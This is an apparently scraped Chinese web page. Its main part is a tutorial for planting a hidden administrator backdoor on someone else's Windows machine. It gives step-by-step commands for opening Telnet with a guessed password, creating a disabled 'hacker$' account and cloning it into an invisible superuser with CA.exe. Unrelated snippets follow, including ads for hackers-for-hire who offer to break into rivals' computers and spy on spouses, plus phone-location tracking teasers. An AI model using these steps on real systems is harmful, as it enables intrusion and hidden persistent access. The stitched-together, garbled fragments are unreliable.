一、利用帐户克隆工具来创建
Clone Administrator(CA.exe),利用这个工具可以将Administrator的帐号克隆为一个指定的普通帐号(此普通帐号必须已经存在)。克隆得到的帐号具有和系统内置的Administrator同样的设置,并且用NET命令或者用户管理器也发现不了其权限已经被提升,是一个不错的ROOT KIT。
现在,我们就来看看如何利用帐户克隆工具在肉鸡上创建隐藏的超级用户。
利用流光、SuperScan等进行扫描,假设已经扫描到一远程主机的Administrator帐户,其密码为123。我们可以使用DameWare Mini Remote Control(简称DMRC),在图形界面(GUI)中来远程控制远程主机。也可以使用OpenTelnet.exe工具来开启远程主机的TELNET服务,其命令格式为:OpenTelnet.exe \\server username password NTLMAuthor telnetport,使用命令:opentelnet \\192.XX.XX.2 Administrator "123" 0 99,呵呵,没想这么成功容易就开启肉鸡的TELNET吧!接着使用命令:Telnet 192.XX.XX.2 99,输入帐户及密码,成功获取一SHELL。
首先想办法查看一下有哪些用户被细心的管理员禁止,一般情况下,有些管理员出于安全考虑,通常会将guest禁用,当然也会禁用其他用户。在图形界面下,非常容易识别,只要在帐户管理器中就可以看到被禁用的帐户上有一个红叉。但在命令行状态下,只能使用命令:“net user 用户名”一个一个来查看用户是否被禁用。如果懒得这样麻烦,可自行建立一个新的帐户,命令为:“Net user hacker$ youkou /add”,然后使用命令:“Net user hacker$ /active:no”来停用此帐户。
断开与远程主机的连接,用小榕的超级用户克隆程序CA.exe,将被禁用的用户hacker$克隆成超级用户,命令为:CA.EXE \\192.XX.XX.2 Administrator 123 hacker$ youkou,成功!
这时,hacker$就成为了超级用户,并有具有和Administrator同样的设置(桌面、菜单等等)。但还是得检查一下,用CCA.exe,命令如下:cca \\192.XX.XX.2 administrator 123。
不收定金的黑客专家(有信誉的黑客联系方式),“你想粉碎仇敌的计算机吗?你想监督你的贸易敌手的一举一动吗?你想晓得你的亲戚是否有婚外情吗?咱们为你供应种种暗号破解服无。”非常近,如许的服无频仍发现在天下...
钱被黑客骗走该谁承担(黑客带我网赌赢了钱)(tiechemo.com)一直致力于黑客(HACK)技术、黑客QQ群、信息安全、web安全、渗透运维、黑客工具、找黑客、黑客联系方式、24小时在线网络黑客、...
本文目录一览: 1、求 声临其境 百度云资源,谢谢 2、为什么声临其境第一季不完整 3、身临其境综艺(正能量原创综艺走出国门) 4、《声临其境第一季(2018)》百度网盘免费资源在线观看,...
这个教程我有,可以联系我————-————————————————————————————仅供参考 ==上次我朋友的号被盗了。材料没找回金子元宝没找回。就找回了紫色装备,4等珠子,3等的一个也没,‘’...
董小姐尤其相信一句话:人这辈子会死三次 第一次是你的心脏停止跳动第二次是在葬礼上第三次是最后一个记得你的人死后 所以这世上总有些人,需要被活着的人铭记。 2003年4月1日,影响力涵盖整个华...
不需要付费的定位软件(输入手机号免费查定位) 如果手机不慎丢失,最直接寻找手机的方法就是通过手机号码进行定位, 实现的方法有多种,那么具体如何用手机号码定位找人呢? 1、部分手机在出厂...